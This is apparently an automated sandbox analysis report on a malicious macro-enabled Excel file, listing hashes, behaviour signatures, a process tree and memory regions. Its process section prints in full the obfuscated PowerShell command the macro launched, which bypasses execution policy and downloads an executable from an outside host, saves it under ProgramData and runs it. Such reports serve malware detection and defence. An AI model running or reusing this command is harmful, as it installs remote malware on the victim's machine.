Analysis

  • max time kernel
    169s
  • max time network
    186s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/01/2024, 11:31

General

  • Target

    4b514645f25fe153167c832dc23588bd.xlsm

  • Size

    42KB

  • MD5

    4b514645f25fe153167c832dc23588bd

  • SHA1

    ab3c02fecdfa31ba2266dc20807b0b2231f96622

  • SHA256

    a3bbc94453e8f621802ffe5a68d1ae7bec3564c3cb95f8289cb063b8f61aa211

  • SHA512

    d34e28e043b2f1ffc2601f81896d5c55f73b1de4da5aae02fbadb8ba605e145eeb56f45e0fd63cdc16306aec38649b19040a869780faea4bc543f152aa805bc3

  • SSDEEP

    768:UT6fbfxpQrZN0DGCfkyX3eks4pSGn0Qic3qd4kMdGzgmJHvJzBn8:Y6VoGzfPeUv022HnZJP958

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4b514645f25fe153167c832dc23588bd.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:1960
  • C:\Windows\system32\cmd.exe
    cmd.exe /c "powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBlAHIAeQBhAG4AagBlAGsALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABpAHMAYQBtAGIAaQBnAHUAYQB0AGUALwBuAG8AbgBlAHEAdQBpAHYAYQBsAGUAbgB0AC8AZABpAHQAcgBpAGcAbwBuAGEAbAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQAKACQAbQBlAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAAoAJAByAGUAcQAuAEMAbwBwAHkAVABvACgAJABtAGUAbQApAAoAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAkAG0AZQBtAC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAkAHIAZQBxAC4AQwBsAG8AcwBlACgAKQAKACQAbQBlAG0ALgBDAGwAbwBzAGUAKAApAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiAA=="
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:4748
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBlAHIAeQBhAG4AagBlAGsALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABpAHMAYQBtAGIAaQBnAHUAYQB0AGUALwBuAG8AbgBlAHEAdQBpAHYAYQBsAGUAbgB0AC8AZABpAHQAcgBpAGcAbwBuAGEAbAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQAKACQAbQBlAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAAoAJAByAGUAcQAuAEMAbwBwAHkAVABvACgAJABtAGUAbQApAAoAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAkAG0AZQBtAC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAkAHIAZQBxAC4AQwBsAG8AcwBlACgAKQAKACQAbQBlAG0ALgBDAGwAbwBzAGUAKAApAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4248

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tyxktu2v.kps.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1960-29-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-17-0x00007FF931C40000-0x00007FF931C50000-memory.dmp

    Filesize

    64KB

  • memory/1960-4-0x00007FF934490000-0x00007FF9344A0000-memory.dmp

    Filesize

    64KB

  • memory/1960-5-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-6-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-8-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-9-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-10-0x00007FF934490000-0x00007FF9344A0000-memory.dmp

    Filesize

    64KB

  • memory/1960-7-0x00007FF934490000-0x00007FF9344A0000-memory.dmp

    Filesize

    64KB

  • memory/1960-11-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-12-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-2-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-13-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-14-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-15-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-16-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-0-0x00007FF934490000-0x00007FF9344A0000-memory.dmp

    Filesize

    64KB

  • memory/1960-24-0x00007FF931C40000-0x00007FF931C50000-memory.dmp

    Filesize

    64KB

  • memory/1960-3-0x00007FF934490000-0x00007FF9344A0000-memory.dmp

    Filesize

    64KB

  • memory/1960-28-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-1-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-95-0x0000022A09010000-0x0000022A09810000-memory.dmp

    Filesize

    8.0MB

  • memory/1960-3759-0x0000022A09010000-0x0000022A09810000-memory.dmp

    Filesize

    8.0MB

  • memory/1960-30-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-3923-0x00007FF974410000-0x00007FF974605000-memory.dmp

    Filesize

    2.0MB

  • memory/1960-3922-0x00007FF934490000-0x00007FF9344A0000-memory.dmp

    Filesize

    64KB

  • memory/1960-3921-0x00007FF934490000-0x00007FF9344A0000-memory.dmp

    Filesize

    64KB

  • memory/1960-3920-0x00007FF934490000-0x00007FF9344A0000-memory.dmp

    Filesize

    64KB

  • memory/1960-3919-0x00007FF934490000-0x00007FF9344A0000-memory.dmp

    Filesize

    64KB

  • memory/4248-3907-0x0000023DF7EF0000-0x0000023DF7F00000-memory.dmp

    Filesize

    64KB

  • memory/4248-3908-0x0000023DF7EF0000-0x0000023DF7F00000-memory.dmp

    Filesize

    64KB

  • memory/4248-3906-0x0000023DF7EF0000-0x0000023DF7F00000-memory.dmp

    Filesize

    64KB

  • memory/4248-3905-0x00007FF948AC0000-0x00007FF949581000-memory.dmp

    Filesize

    10.8MB

  • memory/4248-3902-0x0000023DF7EC0000-0x0000023DF7EE2000-memory.dmp

    Filesize

    136KB

  • memory/4248-3924-0x0000023DF7EF0000-0x0000023DF7F00000-memory.dmp

    Filesize

    64KB

  • memory/4248-3925-0x00007FF948AC0000-0x00007FF949581000-memory.dmp

    Filesize

    10.8MB

  • memory/4248-3926-0x0000023DF7EF0000-0x0000023DF7F00000-memory.dmp

    Filesize

    64KB

  • memory/4248-3927-0x0000023DF7EF0000-0x0000023DF7F00000-memory.dmp

    Filesize

    64KB

  • memory/4248-3930-0x00007FF948AC0000-0x00007FF949581000-memory.dmp

    Filesize

    10.8MB